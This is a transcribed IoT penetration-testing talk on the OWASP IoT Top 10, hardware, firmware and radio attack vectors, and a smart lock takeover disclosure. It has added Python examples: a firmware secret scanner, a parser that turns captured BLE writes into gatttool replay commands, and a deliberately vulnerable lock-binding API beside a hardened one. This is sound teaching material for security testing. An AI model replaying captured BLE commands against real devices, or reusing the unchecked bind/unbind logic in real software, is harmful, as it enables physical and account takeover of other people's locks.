![Page 1: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/1.jpg)
IoT Device Penetration Testing - Shubham Chougule
Agenda
What is Internet of Things ?
Application of IoT
OWASP Top 10 for IoT
Attack Vectors
Methodologies
Tools for IoT Lab
Examples
Best Practices
What is IoT?
• IoT stands for the Internet of Things.
• The Internet of Things (IoT) is the network of physical objects (devices, vehicles, buildings and other items embedded with electronics, software, sensors and network connectivity) that enables these objects to collect and exchange data.
• Worldwide, 50 billion devices are forecast to be connected to the Internet by 2030.
• Revenue is forecast to grow from $1.9 trillion in 2013 to $7.1 trillion in 2020.
How IoT Works
Applications of IoT
OWASP Top 10 IoT
1. Weak, guessable, or hardcoded passwords
2. Insecure network services
3. Insecure ecosystem interfaces
4. Lack of secure update mechanism
5. Use of insecure or outdated components
6. Insufficient privacy protection
7. Insecure data transfer and storage
8. Lack of device management
9. Insecure default settings
10. Lack of physical hardening
The Attack Vectors
• Hardware
• Firmware
• Network
• Wireless communications
• Mobile and web applications
• Cloud APIs
Source: Attify
IoT Pentesting Methodologies
• IoT device hardware pentest
• Internal communication buses such as UART, I2C and SPI
• Open debug ports
• JTAG debugging
• Extracting firmware from EEPROM or flash memory
• Tampering
Dumping flash memory
Open UART ports
JTAG exploitation
Source: FireEye
• Firmware penetration testing
• Binary analysis
• Reverse engineering
• Analyzing the different file systems inside the image
• Sensitive keys and certificates
• Firmware modification
Hardcoded MQTT credentials
File system
Extraction of .bin file
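As an added example (not code from the talk), the script below does the first pass a tester runs on the .bin extracted from a flash dump or pulled from the vendor's update server: a binwalk-style scan for file-system and container magic values, then a strings pass with patterns for the kind of material this slide shows (hardcoded MQTT credentials, private keys, cloud access keys, password hashes). The firmware image is constructed inline and contains no real credentials; the AWS key ID in it is Amazon's published example value, and the signature list is a small subset of what binwalk knows.

```python
"""Binwalk/strings-style triage of a firmware image or raw flash dump (added example)."""
import re
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# Magic values for containers commonly found in IoT images; scanned at every offset, as binwalk does.
SIGNATURES = [
    (b"\x27\x05\x19\x56", "uImage header"),
    (b"\x1f\x8b\x08", "gzip stream"),
    (b"hsqs", "SquashFS (little-endian)"),
    (b"sqsh", "SquashFS (big-endian)"),
    (b"UBI#", "UBI volume"),
    (b"\x7fELF", "ELF binary"),
]

# Material that should never ship inside an image. Patterns are loose on purpose: triage should over-report.
SECRET_PATTERNS = [
    ("mqtt-credentials", re.compile(rb"mqtts?://([^:/\s@]+):([^@\s]+)@([^\s/]+)")),
    ("pem-private-key", re.compile(rb"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")),
    ("aws-access-key-id", re.compile(rb"\bAKIA[0-9A-Z]{16}\b")),
    ("password-hash", re.compile(rb"\b[a-z_][a-z0-9_-]{0,31}:\$[1-6y]\$[^:\s]+")),
    ("credential-assignment",
     re.compile(rb"(?:passw(?:or)?d|secret|api[_-]?key)\s*[=:]\s*\S+", re.IGNORECASE)),
]


@dataclass
class Finding:
    kind: str      # signature name or secret-pattern name
    offset: int    # byte offset in the image (what you would pass to dd/binwalk -o)
    excerpt: str   # magic bytes as hex, or the matched text


def find_signatures(blob: bytes) -> List[Finding]:
    """Every occurrence of every known magic value, ordered by offset."""
    hits = []
    for magic, name in SIGNATURES:
        pos = blob.find(magic)
        while pos != -1:
            hits.append(Finding(name, pos, magic.hex()))
            pos = blob.find(magic, pos + 1)
    return sorted(hits, key=lambda f: f.offset)


def extract_strings(blob: bytes, min_len: int = 6) -> Iterator[Tuple[int, bytes]]:
    """Equivalent of `strings -n 6`: (offset, run) for each run of printable ASCII."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob):
        yield m.start(), m.group()


def find_secrets(blob: bytes) -> List[Finding]:
    """Run the secret patterns over each printable string, keeping image offsets."""
    hits = []
    for off, run in extract_strings(blob):
        for kind, pattern in SECRET_PATTERNS:
            for m in pattern.finditer(run):
                hits.append(Finding(kind, off + m.start(), m.group()[:60].decode("ascii", "replace")))
    return sorted(hits, key=lambda f: f.offset)


def triage(blob: bytes) -> dict:
    return {"signatures": find_signatures(blob), "secrets": find_secrets(blob)}


# Constructed stand-in for an extracted .bin: three container headers followed by a few leaked strings.
SAMPLE_IMAGE = (
    b"\x00" * 64
    + b"\x27\x05\x19\x56" + b"\x00" * 60        # uImage header at offset 64
    + b"\x1f\x8b\x08\x00" + b"\x00" * 60        # gzip stream at offset 128
    + b"hsqs" + b"\x00" * 60                      # SquashFS root file system at offset 192
    + b"mqtt://device01:s3cr3t@broker.example.internal:1883\x00"
    + b"root:$1$saltsalt$abcdefghijklmnopqrstu:0:0:root:/root:/bin/sh\x00"
    + b"-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEA\n-----END RSA PRIVATE KEY-----\x00"
    + b"aws_access_key_id=AKIAIOSFODNN7EXAMPLE\x00"   # Amazon's documented example key ID
    + b"API_KEY=0123456789abcdef\x00"
)

if __name__ == "__main__":
    report = triage(SAMPLE_IMAGE)
    for f in report["signatures"] + report["secrets"]:
        print(f"0x{f.offset:08x}  {f.kind:26s} {f.excerpt}")
```

The signature offsets are what you carve at (`dd if=fw.bin bs=1 skip=192 | unsquashfs -` or `binwalk -e`); the secret hits are the starting point for the "hardcoded MQTT credentials" finding on this slide, and the MQTT match in particular should be followed by checking whether the same broker account is shared across every unit of the product.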
• Radio security analysis
• Exploitation of communication protocols
• BLE, Zigbee, LoRa, 6LoWPAN
• Sniffing radio packets
• Jamming-based attacks
• Modifying and replaying packets
EXPLOITING BLE 4.0 COMMUNICATION
btsnoop_hci.log
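The btsnoop_hci.log on this slide is the file Android writes when HCI snoop logging is switched on in developer options; it records every HCI packet the phone's app exchanges with the device. The parser below is an added example, not code from the talk: it reads that file format (btsnoop v1, H4 datalink), keeps the ATT Write Request/Command PDUs, which are the packets that normally carry "unlock"-style commands, and emits gatttool command lines to replay them against the peripheral. The sample log, connection handle, attribute handles and payload bytes are constructed for the example and the MAC address passed to gatttool_replay is a placeholder. L2CAP fragments that continue an earlier packet are skipped rather than reassembled, which is enough for the short ATT writes this kind of device sends.

```python
"""Pull ATT writes out of an Android btsnoop_hci.log and turn them into gatttool replay commands (added example)."""
import struct
from dataclasses import dataclass
from typing import Iterator, List, Tuple

BTSNOOP_MAGIC = b"btsnoop\x00"
DLT_HCI_H4 = 1002                          # datalink type Android uses for btsnoop_hci.log
BTSNOOP_EPOCH_DELTA = 0x00DCDDB30F2F8000   # microseconds from year 0 (btsnoop epoch) to 1970-01-01
H4_ACL_DATA = 0x02
L2CAP_CID_ATT = 0x0004
ATT_WRITE_REQ = 0x12                       # Write Request (peer answers with Write Response)
ATT_WRITE_CMD = 0x52                       # Write Command (no response)


@dataclass
class AttWrite:
    record: int     # index of the btsnoop record the write came from
    time: float     # Unix timestamp in seconds
    sent: bool      # True = host -> controller, i.e. the phone wrote to the peripheral
    opcode: int
    handle: int     # ATT attribute handle
    value: bytes


def btsnoop_records(data: bytes) -> Iterator[Tuple[int, int, float, bytes]]:
    """Yield (index, flags, unix_time, packet) for each record of a btsnoop v1 H4 file."""
    if data[:8] != BTSNOOP_MAGIC:
        raise ValueError("not a btsnoop file")
    version, dlt = struct.unpack(">II", data[8:16])
    if version != 1 or dlt != DLT_HCI_H4:
        raise ValueError(f"unsupported btsnoop version/datalink {version}/{dlt}")
    off, index = 16, 0
    while off + 24 <= len(data):
        _orig_len, incl_len, flags, _drops, ts_us = struct.unpack(">IIIIq", data[off:off + 24])
        off += 24
        packet = data[off:off + incl_len]
        off += incl_len
        yield index, flags, (ts_us - BTSNOOP_EPOCH_DELTA) / 1e6, packet
        index += 1


def extract_att_writes(data: bytes) -> List[AttWrite]:
    """Walk ACL packets, peel off the L2CAP header and keep ATT Write Request/Command PDUs."""
    writes = []
    for index, flags, when, pkt in btsnoop_records(data):
        if len(pkt) < 9 or pkt[0] != H4_ACL_DATA:
            continue                                   # HCI commands, events and SCO carry no ATT
        handle_flags, _acl_len = struct.unpack("<HH", pkt[1:5])
        if (handle_flags >> 12) & 0x3 == 0x1:
            continue                                   # continuation fragment: not reassembled here
        l2cap_len, cid = struct.unpack("<HH", pkt[5:9])
        if cid != L2CAP_CID_ATT:
            continue
        att = pkt[9:9 + l2cap_len]
        if len(att) < 3 or att[0] not in (ATT_WRITE_REQ, ATT_WRITE_CMD):
            continue
        att_handle = struct.unpack("<H", att[1:3])[0]
        writes.append(AttWrite(index, when, (flags & 1) == 0, att[0], att_handle, att[3:]))
    return writes


def gatttool_replay(mac: str, w: AttWrite) -> str:
    """gatttool invocation that re-sends the captured write to the peripheral at `mac`."""
    opt = "--char-write-req" if w.opcode == ATT_WRITE_REQ else "--char-write"
    return f"gatttool -b {mac} {opt} -a 0x{w.handle:04x} -n {w.value.hex()}"


def _record(flags: int, ts_us: int, pkt: bytes) -> bytes:
    return struct.pack(">IIIIq", len(pkt), len(pkt), flags, 0, ts_us) + pkt


def _acl_att(conn_handle: int, att_pdu: bytes) -> bytes:
    # H4 indicator, ACL header (PB flag 0b10 = start of an L2CAP PDU), L2CAP header on the ATT channel
    handle_flags = (conn_handle & 0x0FFF) | (0x2 << 12)
    l2cap = struct.pack("<HH", len(att_pdu), L2CAP_CID_ATT) + att_pdu
    return bytes([H4_ACL_DATA]) + struct.pack("<HH", handle_flags, len(l2cap)) + l2cap


def build_sample_log() -> bytes:
    """Constructed btsnoop_hci.log, not a real capture: one HCI command, two writes, one read response."""
    t0 = BTSNOOP_EPOCH_DELTA + 1_500_000
    header = BTSNOOP_MAGIC + struct.pack(">II", 1, DLT_HCI_H4)
    return header + b"".join([
        _record(0x2, t0, bytes([0x01, 0x0C, 0x20, 0x02, 0x01, 0x00])),       # HCI LE Set Scan Enable (command)
        _record(0x0, t0 + 1000, _acl_att(0x0040, b"\x12\x25\x00\x01\x00")),   # Write Req handle 0x0025: enable notifications
        _record(0x0, t0 + 2000, _acl_att(0x0040, b"\x52\x12\x00\xaa\x55\x01")),  # Write Cmd handle 0x0012: made-up app payload
        _record(0x1, t0 + 3000, _acl_att(0x0040, b"\x0b\x00")),               # Read Response from the peripheral
    ])


if __name__ == "__main__":
    for w in extract_att_writes(build_sample_log()):
        print(f"[{w.record}] t={w.time:.3f} {'tx' if w.sent else 'rx'} "
              f"{gatttool_replay('AA:BB:CC:DD:EE:FF', w)}")
```

Replaying the writes as-is only works when the characteristic is not protected by pairing/bonding or an application-layer challenge; if the value changes on every unlock, the log still tells you which handle to study in the app's decompiled code.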
Analysis of radio signals using USRP
• Mobile, web and cloud application testing
• Web dashboards: XSS, IDOR, injections
• Source code review of the Android (.apk) and iOS apps
• Application reversing
• Hardcoded API keys
• Cloud credentials for MQTT, CoAP, AWS etc.
Software Tools

| Hardware level | Firmware level | Radio security |
|---|---|---|
| baudrate.py | Binwalk | gatttool |
| esptool | strings | hcitool |
| flashrom | IDA Pro | GNU Radio |
| minicom | Radare2 | KillerBee |
| screen | QEMU | |
Hardware Tools
HackRF
Bus Pirate
JTAGulator
Ubertooth
ChipWhisperer
TTL-USB converter
Zigbee sniffer
Smart Lock Disclosure
Getting QR code and Lock ID
Getting the USER ID
Unbind the Lock from victim’s account
Bind the Lock to attacker’s account
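The four screenshots describe an authorization failure in the cloud side of the product: the API accepted unbind and bind requests from any authenticated caller who supplied the lock ID (printed on the QR label) and a user ID, neither of which is a secret. The model below is an added example and not the vendor's code; it assumes nothing about their real API. It puts that flaw next to a version that requires the caller to be the current owner before unbinding and a one-time pairing token, assumed here to be produced by the lock itself during a physical reset, before binding. Class and method names are invented for the illustration.

```python
"""Account binding for a cloud-managed smart lock: the disclosed flaw class beside a checked version (added example)."""
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional


class AuthorizationError(Exception):
    pass


@dataclass
class Lock:
    lock_id: str                         # printed on the QR label: public, never an authorizer
    owner: Optional[str] = None
    pairing_token: Optional[str] = None  # one-time secret shown by the lock during a physical reset (assumed)


class LockCloudVulnerable:
    """Unbind/bind only look at the lock ID, so possession of the QR code equals ownership."""

    def __init__(self) -> None:
        self.locks: Dict[str, Lock] = {}

    def register(self, lock_id: str, owner: str) -> None:
        self.locks[lock_id] = Lock(lock_id, owner)

    def owner_of(self, lock_id: str) -> Optional[str]:
        return self.locks[lock_id].owner

    def unbind(self, lock_id: str, caller: str) -> None:
        # caller is authenticated, but never compared against the record: the IDOR
        self.locks[lock_id].owner = None

    def bind(self, lock_id: str, caller: str, pairing_token: str = "") -> None:
        self.locks[lock_id].owner = caller


class LockCloudHardened(LockCloudVulnerable):
    """Same API surface, with ownership and proof-of-possession checks."""

    def unbind(self, lock_id: str, caller: str) -> None:
        lock = self.locks[lock_id]
        if lock.owner != caller:
            raise AuthorizationError("only the current owner may unbind")
        lock.owner = None

    def start_physical_reset(self, lock_id: str) -> str:
        """Stands in for the lock generating a fresh code after a hardware reset (assumption)."""
        token = secrets.token_hex(16)
        self.locks[lock_id].pairing_token = token
        return token

    def bind(self, lock_id: str, caller: str, pairing_token: str = "") -> None:
        lock = self.locks[lock_id]
        if lock.owner is not None:
            raise AuthorizationError("lock is already bound to an account")
        if lock.pairing_token is None or not hmac.compare_digest(lock.pairing_token, pairing_token):
            raise AuthorizationError("pairing token missing or wrong")
        lock.owner = caller
        lock.pairing_token = None        # single use


def takeover_attempt(cloud: LockCloudVulnerable, lock_id: str, attacker: str) -> bool:
    """Replay the disclosed sequence (unbind from victim, bind to attacker); True if the lock changed hands."""
    try:
        cloud.unbind(lock_id, attacker)
        cloud.bind(lock_id, attacker)
    except AuthorizationError:
        return False
    return cloud.owner_of(lock_id) == attacker


if __name__ == "__main__":
    for cls in (LockCloudVulnerable, LockCloudHardened):
        cloud = cls()
        cloud.register("LOCK-0001", "victim")
        print(cls.__name__, "takeover succeeded:", takeover_attempt(cloud, "LOCK-0001", "attacker"))
```

The fix is not to hide the lock ID (it is on the label and in every QR scan) but to stop treating it as proof of anything: unbind is tied to the account that owns the record, and a new bind needs something only the person holding the lock can obtain.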
Best Practices
• Make hardware tamper resistant
• Provide for firmware updates/patches
• Specify procedures to protect data on device disposal
• Use strong authentication
• Use strong encryption and secure protocols
• Specify a destruction method for devices that break down, so that stored data and keys cannot be recovered from them